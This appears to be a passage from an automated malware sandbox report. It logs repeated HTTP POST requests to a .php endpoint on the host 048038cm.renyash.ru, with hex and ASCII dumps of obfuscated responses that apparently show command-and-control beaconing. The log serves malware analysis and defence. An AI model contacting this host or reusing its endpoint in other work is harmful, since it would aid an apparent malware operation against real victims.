                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=10949&min_rtt=1714&rtt_var=8913&sent=61&recv=55&lost=0&retrans=0&sent_bytes=11120&recv_bytes=22780&delivery_rate=2445561&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 39 38 0d 0a 00 1a 23 1e 3c 24 04 59 20 02 27 0f 33 2c 22 59 2b 3d 04 01 29 33 3f 41 29 16 1e 09 26 28 05 06 3f 28 31 18 24 01 32 57 36 13 0d 0c 2b 3a 21 46 04 1e 22 03 20 07 30 5f 29 20 2e 0f 3e 02 3b 06 21 1e 3a 04 27 03 3a 0a 31 16 2f 1e 36 5a 3b 56 25 2c 23 50 38 34 36 5f 2e 33 3e 0c 31 04 2c 5e 0e 12 39 15 32 09 35 59 3c 3b 25 5c 27 30 2b 1c 25 2b 31 5b 33 02 27 51 20 3b 2d 5f 3f 0e 3b 54 33 2f 2b 0a 39 38 37 58 27 07 06 1d 2a 18 21 5e 2f 0d 2c 51 00 34 54 56 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 98#<$Y '3,"Y+=)3?A)&(?(1$2W6+:!F" 0_) .>;!:':1/6Z;V%,#P846_.3>1,^925Y<;%\'0+%+1[3'Q ;-_?;T3/+987X'*!^/,Q4TV0
                                                                        Dec 28, 2024 20:42:41.813085079 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2100
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:42:42.145750046 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:42:42.680454969 CET961INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:42:42 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=y517bgNr5r%2FEqiOTW%2B4NYJY03NASBzQGOh2evgvxPvXOxuNQoVP96ChH1Iz9LzBB0Xkw5duyslDSvMHnz0fTjauvenX4GxcDoPHlgs2kEoK5Y2BNICaKoygoWIpfdnoAHgyMse67"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f9408f86e8c42cc-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=11934&min_rtt=1714&rtt_var=10940&sent=67&recv=60&lost=0&retrans=0&sent_bytes=12111&recv_bytes=25186&delivery_rate=2445561&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 39 38 0d 0a 00 1a 20 0a 3f 34 39 06 37 15 20 52 24 2c 29 00 2a 3d 3a 02 28 20 27 45 2b 38 27 54 31 38 2f 06 2b 06 2e 40 30 01 31 0c 21 3d 23 0f 28 2a 21 46 04 1e 21 5d 37 3e 28 12 3d 0a 31 1e 29 5a 33 05 21 20 39 5e 24 04 3d 14 26 28 23 1e 21 3c 3f 13 27 02 06 09 38 27 36 5d 2d 30 21 55 31 3e 2c 5e 0e 12 3a 0f 24 30 29 11 3f 3b 36 04 30 33 38 09 25 2b 31 11 24 28 38 08 37 06 3d 5c 3f 30 24 0c 33 3c 37 0e 2e 15 09 5c 30 17 0e 1c 29 22 21 5e 2f 0d 2c 51 00 34 54 56 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 98 ?497 R$,)*=:( 'E+8'T18/+.@01!=#(*!F!]7>(=1)Z3! 9^$=&(#!<?'8'6]-0!U1>,^:$0)?;6038%+1$(87=\?0$3<7.\0)"!^/,Q4TV0
                                                                        Dec 28, 2024 20:42:42.688981056 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2100
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:42:43.021095037 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:42:43.512480021 CET959INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:42:43 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MiKylsjq5%2FeJ69EC1PfkCWQfONYFARs4O2AA59SpJOBsuStslxCG8YbG2rQLAmx6yeCfdvpeBH4KKdSfxhJXYzbN6CZG2ZyoRxDouSx2EJEDpXRmqe2rQ6MKQeK6JoZGqd6Rvnw2"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f9408fded0942cc-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=14577&min_rtt=1714&rtt_var=15872&sent=72&recv=65&lost=0&retrans=0&sent_bytes=13097&recv_bytes=27592&delivery_rate=2445561&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 39 38 0d 0a 00 1a 23 53 2b 1a 2e 5b 34 02 28 1f 26 3c 22 14 3e 2e 22 05 2a 56 3c 1a 2b 2b 28 0f 25 5e 3b 03 3c 16 3d 18 33 3f 26 1d 36 13 0d 0f 3c 3a 21 46 04 1e 21 5c 20 3e 06 13 29 55 2a 0e 2a 02 2b 03 35 1e 1b 1a 24 5c 32 0b 26 01 3b 1f 22 2c 30 09 30 3f 2f 14 2f 1a 3d 04 39 1e 2e 0e 26 3e 2c 5e 0e 12 3a 0e 26 23 35 5a 2b 01 39 58 24 30 3f 51 26 2b 32 02 30 3b 27 57 37 01 3d 14 28 20 33 55 30 3f 3f 0c 39 2b 27 5f 26 2a 23 0e 29 18 21 5e 2f 0d 2c 51 00 34 54 56 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 98#S+.[4(&<">."*V<++(%^;<=3?&6<:!F!\ >)U**+5$\2&;",00?//=9.&>,^:&#5Z+9X$0?Q&+20;'W7=( 3U0??9+'_&*#)!^/,Q4TV0
                                                                        Dec 28, 2024 20:42:43.515008926 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2100
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:42:43.848668098 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:42:44.376066923 CET963INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:42:44 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eGxVwgm9XByafzHL2cFbPIeQkG%2Bt82P67iNqIcpVoIaaQ0xYO22gdxt6x2XalR3Vi0ffJJjYnsBI65ElWasPFCcTpeB%2BxHfH5FSwU1wVv208ybSGIo0%2B3EsRCNF8WkIgNChv2hC7"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f94090309fd42cc-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=12819&min_rtt=1714&rtt_var=11642&sent=77&recv=70&lost=0&retrans=0&sent_bytes=14081&recv_bytes=29998&delivery_rate=2445561&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 39 38 0d 0a 00 1a 20 0a 2a 37 29 03 37 38 2c 56 27 5a 3d 04 29 5b 25 13 29 0e 0d 45 2a 5e 37 50 32 38 2c 5f 3e 38 0b 1a 33 3c 35 0c 35 03 0a 1f 3c 10 21 46 04 1e 21 58 34 00 20 1d 3e 0a 3d 55 3d 3c 2b 07 22 1e 1b 5d 27 04 3d 19 26 5e 20 0f 21 02 0e 08 25 3f 24 08 2c 24 2a 5f 39 30 2d 55 24 3e 2c 5e 0e 12 39 1a 32 30 35 59 3f 38 13 5a 27 23 3b 57 26 3b 39 11 24 02 27 1d 20 16 31 5d 28 1e 23 56 24 01 0e 1d 3a 02 2b 5e 26 2a 2f 0d 3d 08 21 5e 2f 0d 2c 51 00 34 54 56 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 98 *7)78,V'Z=)[%)E*^7P28,_>83<55<!F!X4 >=U=<+"]'=&^ !%?$,$*_90-U$>,^9205Y?8Z'#;W&;9$' 1](#V$:+^&*/=!^/,Q4TV0
                                                                        Dec 28, 2024 20:42:44.483464956 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2100
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:42:44.816317081 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:42:45.351804018 CET962INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:42:45 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=evuJ0D4eKdUWXCt9kkBqW24h6F%2BzOOcmpGAWD25BjgAJndrzLL3dtzKWtG%2F1Z4aXoSpMfbyaJZE1Bh%2BNEDR2wOuJC8iNBW5dUt1PEFSdkRnPIqRXIJ3hJsA3FKI6t56MAqbOHt12"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f94090918d942cc-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=11633&min_rtt=1714&rtt_var=8991&sent=83&recv=75&lost=0&retrans=0&sent_bytes=15069&recv_bytes=32404&delivery_rate=2445561&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 39 38 0d 0a 00 1a 20 0a 28 0a 25 01 20 2b 23 0b 33 3f 22 58 2b 2d 2d 58 2a 30 37 45 3d 38 37 51 25 16 30 1d 3e 28 0c 44 27 11 21 09 22 3d 27 0c 2b 10 21 46 04 1e 22 04 21 3d 37 02 3e 33 2e 0b 2a 2c 3b 04 21 30 13 5e 27 04 32 0a 32 28 01 1f 21 3f 3b 50 30 2c 33 57 38 37 21 02 2f 30 0b 1e 25 14 2c 5e 0e 12 39 52 25 20 26 03 2b 38 13 1f 27 20 2b 54 27 3b 3d 12 26 28 38 08 34 01 3d 58 2b 30 15 52 30 11 2f 0c 3a 15 2b 16 27 29 33 08 2a 08 21 5e 2f 0d 2c 51 00 34 54 56 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 98 (% +#3?"X+--X*07E=87Q%0>(D'!"='+!F"!=7>3.*,;!0^'22(!?;P0,3W87!/0%,^9R% &+8' +T';=&(84=X+0R0/:+')3*!^/,Q4TV0
                                                                        Dec 28, 2024 20:42:45.425496101 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2100
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:42:45.757791042 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:42:46.299498081 CET965INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:42:46 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FqgDG0VRNddNRP2OTna4Aj5YCD79NGITURGfffOVBlJLWO4tYrCM4bQsLM974PJLXlu0GNxThIf%2F%2FRxNRDM34ve74HCJdqRcnXN1EcWkbTgu27njQYuuykhkqYGVNd3rboWgc%2BrA"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f94090efebf42cc-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=12135&min_rtt=1714&rtt_var=10224&sent=89&recv=80&lost=0&retrans=0&sent_bytes=16056&recv_bytes=34810&delivery_rate=2445561&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 39 38 0d 0a 00 1a 23 53 3c 1a 04 1d 21 2b 20 1c 30 05 21 00 29 2d 25 10 28 23 37 08 2b 28 34 08 26 28 24 5b 2b 06 2e 43 27 06 2a 55 22 2e 2c 52 3f 00 21 46 04 1e 21 5c 20 3d 33 00 2a 1d 2a 0c 2a 3c 3c 5a 35 33 39 17 30 39 3a 0e 25 3b 3b 1e 21 02 3f 1d 33 02 2c 08 38 24 0c 16 39 0e 3d 10 25 2e 2c 5e 0e 12 39 56 25 09 35 59 28 5e 21 59 24 30 28 0c 27 3b 0b 5c 33 2b 3f 51 34 06 0b 5f 29 20 3f 55 30 59 38 57 2e 02 3f 59 33 07 06 54 29 22 21 5e 2f 0d 2c 51 00 34 54 56 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 98#S<!+ 0!)-%(#7+(4&($[+.C'*U".,R?!F!\ =3***<<Z53909:%;;!?3,8$9=%.,^9V%5Y(^!Y$0(';\3+?Q4_) ?U0Y8W.?Y3T)"!^/,Q4TV0
                                                                        Dec 28, 2024 20:42:46.300417900 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2100
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:42:46.633831978 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:42:47.458699942 CET961INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:42:47 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mVxxioYxJOtcIz82HKUX2hmk%2BCGPlOada5e%2BkCqUXZTquv42I2CZVlTJ0O7gUa7elPdCqqYCDVsKRsF6ztsXdhvQZHPJ6xCRJmQoCCM7J3UEcBBrg6UBc3OuFYugAvsqPajjY5WY"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f9409147c1042cc-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=12416&min_rtt=1714&rtt_var=10819&sent=95&recv=85&lost=0&retrans=0&sent_bytes=17046&recv_bytes=37216&delivery_rate=2445561&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 39 38 0d 0a 00 1a 23 57 2b 27 32 5f 34 28 2c 52 24 2c 22 1b 29 04 25 10 29 33 37 40 3d 01 20 0e 27 3b 2f 02 3f 06 2d 1c 25 2f 22 55 36 04 2f 0c 2b 3a 21 46 04 1e 21 1e 37 3d 28 5b 29 1d 31 52 2b 3c 28 19 21 30 29 5d 26 3a 3d 50 32 28 2b 53 21 2c 0e 0d 24 2c 2b 53 38 1a 0b 03 2d 33 39 55 26 2e 2c 5e 0e 12 39 1a 32 33 21 5a 3f 06 1b 1f 24 1e 2b 51 31 5d 21 12 27 2b 2c 08 20 28 21 15 2b 0e 11 10 27 3f 2b 0e 2c 38 3c 05 24 2a 20 1d 29 18 21 5e 2f 0d 2c 51 00 34 54 56 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 98#W+'2_4(,R$,")%)37@= ';/?-%/"U6/+:!F!7=([)1R+<(!0)]&:=P2(+S!,$,+S8-39U&.,^923!Z?$+Q1]!'+, (!+'?+,8<$* )!^/,Q4TV0
                                                                        Dec 28, 2024 20:42:47.469841003 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2076
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:42:47.802097082 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:42:48.329431057 CET965INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:42:48 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=K4L9KnqkeGVTFInwE1FcBgrxYWZ07cqTvxnuzXLE1CXBlF4nXIUhKk4ck8Co%2BOi%2BW5Z5hjxV8Tts%2B0cht6NcRh9bNPN2p3jBYO3%2Bh5qzlwB7WnJP4xqvFQDCvcvdaTR2NSH5BOda"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f94091bcbe342cc-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=11109&min_rtt=1714&rtt_var=8076&sent=101&recv=90&lost=0&retrans=0&sent_bytes=18032&recv_bytes=39598&delivery_rate=2445561&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 39 38 0d 0a 00 1a 23 55 3c 1d 2e 12 20 28 2c 11 33 05 3e 5c 2a 5b 21 5b 3e 56 2b 44 3e 01 23 54 25 3b 27 06 3c 38 32 08 30 01 08 57 20 2d 33 0e 2a 2a 21 46 04 1e 22 04 34 2e 20 58 2a 0d 3d 1e 2a 02 2f 06 36 30 13 5c 30 04 29 56 26 3b 23 57 36 5a 2f 54 33 12 06 08 38 1d 36 5c 3a 30 26 0a 31 04 2c 5e 0e 12 3a 0b 31 30 3d 10 28 2b 26 02 33 30 33 1f 26 05 3e 02 30 3b 23 55 21 38 31 5e 3f 1e 3b 1d 24 2f 3c 55 3a 15 28 01 30 39 30 1d 3e 32 21 5e 2f 0d 2c 51 00 34 54 56 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 98#U<. (,3>\*[![>V+D>#T%;'<820W -3**!F"4. X*=*/60\0)V&;#W6Z/T386\:0&1,^:10=(+&303&>0;#U!81^?;$/<U:(090>2!^/,Q4TV0
                                                                        Dec 28, 2024 20:42:48.331284046 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2100
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:42:48.663532972 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:42:49.192925930 CET963INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:42:49 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gNgP6Yo1JTloJQczTDf9IvJqHZDGriXqf2zAHXndMdgcmg80Dtv%2FHWtnlUQ8Ox2XEeGXlBxHXocSZ2TsvsPO2bU9jtDWJnyuA7ajB3lPxnbHzep1UQsVJ8r6%2BvgN%2F0JgBMW2MrtT"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f94092128d542cc-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=11775&min_rtt=1712&rtt_var=9759&sent=107&recv=95&lost=0&retrans=0&sent_bytes=19022&recv_bytes=42004&delivery_rate=2445561&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 39 38 0d 0a 00 1a 20 0c 28 42 32 12 23 38 2f 0d 26 2c 25 00 29 2e 36 00 28 20 2c 19 3e 06 2b 56 25 16 0e 5e 3f 5e 22 45 30 01 35 0e 21 04 33 0a 3f 3a 21 46 04 1e 21 5a 34 00 20 58 29 30 35 1f 29 2c 24 19 35 30 36 05 27 2a 21 1a 31 06 0d 10 20 3c 20 0f 30 3c 0d 53 3b 42 21 07 2e 0e 0c 0c 32 3e 2c 5e 0e 12 39 1b 26 33 2a 01 3f 5e 21 5b 24 0e 37 1d 25 2b 25 5b 30 3b 3b 54 20 2b 2d 15 2b 0e 11 56 33 3f 2c 56 3a 15 37 5e 27 17 01 0d 3e 22 21 5e 2f 0d 2c 51 00 34 54 56 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 98 (B2#8/&,%).6( ,>+V%^?^"E05!3?:!F!Z4 X)05),$506'*!1 < 0<S;B!.2>,^9&3*?^![$7%+%[0;;T +-+V3?,V:7^'>"!^/,Q4TV0
                                                                        Dec 28, 2024 20:42:49.197416067 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2076
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:42:49.529613972 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:42:50.096831083 CET964INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:42:49 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bSpdA%2FhhQqw9wuR6OcxWEcC8XJrf7ZNFOTiOqa7WYc4IGslPs1xT1QhJ08uWoqwUdHKiUwBiMQB9TsxviO2XQryazaua2d%2BBbZjv7aGfmzUnHUV%2B2GWvJqhuvSfctcl3fGwqCedc"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f9409268e8042cc-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=11469&min_rtt=1712&rtt_var=9216&sent=113&recv=100&lost=0&retrans=0&sent_bytes=20010&recv_bytes=44386&delivery_rate=2445561&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 39 38 0d 0a 00 1a 23 55 3f 34 2a 5f 23 5d 2c 53 24 2c 3a 16 29 03 00 02 29 20 27 42 2a 5e 3f 56 25 06 30 10 3f 06 2e 09 30 2c 35 0d 22 04 2b 0b 2a 3a 21 46 04 1e 21 5d 34 2e 27 07 3d 20 35 52 29 02 2c 5d 22 1e 21 5c 33 3a 0b 1a 32 38 09 1d 21 5a 23 50 33 3c 3f 57 2c 34 29 06 3a 30 39 54 25 3e 2c 5e 0e 12 3a 0f 25 0e 25 5a 3f 06 3d 5b 24 30 3f 12 26 15 00 05 33 28 2f 56 20 28 29 5d 2b 23 3c 0c 26 3c 3b 0c 2e 2b 05 5c 27 3a 34 1e 3e 22 21 5e 2f 0d 2c 51 00 34 54 56 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 98#U?4*_#],S$,:)) 'B*^?V%0?.0,5"+*:!F!]4.'= 5R),]"!\3:28!Z#P3<?W,4):09T%>,^:%%Z?=[$0?&3(/V ()]+#<&<;.+\':4>"!^/,Q4TV0
                                                                        Dec 28, 2024 20:42:50.105993032 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2100
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:42:50.446816921 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:42:50.974180937 CET967INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:42:50 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=18Cc%2F5JMVENeNRN5S%2Fc9Yl2obVf2%2BpWARRW0fCSdc4zd4y4MhPhCMsdevM5rZURwEsr2IM0IpmhUSpwWoAngFYA3P0AP73aUm5kRdkRNkL7jM9EVseRZEnBSg5R6pKLnZhQ%2FSkEh"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f94092c3bfd42cc-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=12748&min_rtt=1712&rtt_var=11895&sent=119&recv=105&lost=0&retrans=0&sent_bytes=20999&recv_bytes=46792&delivery_rate=2445561&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 39 38 0d 0a 00 1a 20 0e 28 37 2d 02 23 3b 2c 56 24 2c 08 5f 3e 04 21 59 29 0e 2c 1b 29 2b 23 51 26 2b 20 12 3c 38 22 44 25 3f 2a 1e 21 3e 2c 11 28 10 21 46 04 1e 21 5b 23 2e 3c 58 2a 1d 31 57 29 3c 23 07 21 30 26 05 27 39 26 0a 26 3b 2c 0a 21 2c 0e 08 24 5a 2f 1b 3b 24 2a 5f 2e 20 2d 53 26 2e 2c 5e 0e 12 39 15 26 56 2a 02 29 2b 35 5b 33 33 28 09 26 2b 31 59 24 05 2b 57 21 38 3d 5c 2b 0e 30 0f 26 2f 2f 0e 2e 3b 3c 04 27 5f 3f 08 2a 32 21 5e 2f 0d 2c 51 00 34 54 56 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 98 (7-#;,V$,_>!Y),)+#Q&+ <8"D%?*!>,(!F![#.<X*1W)<#!0&'9&&;,!,$Z/;$*_. -S&.,^9&V*)+5[33(&+1Y$+W!8=\+0&//.;<'_?*2!^/,Q4TV0
                                                                        Dec 28, 2024 20:42:50.977061987 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2100
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:42:51.309544086 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:42:51.839319944 CET965INHTTP/1.1 200 OK
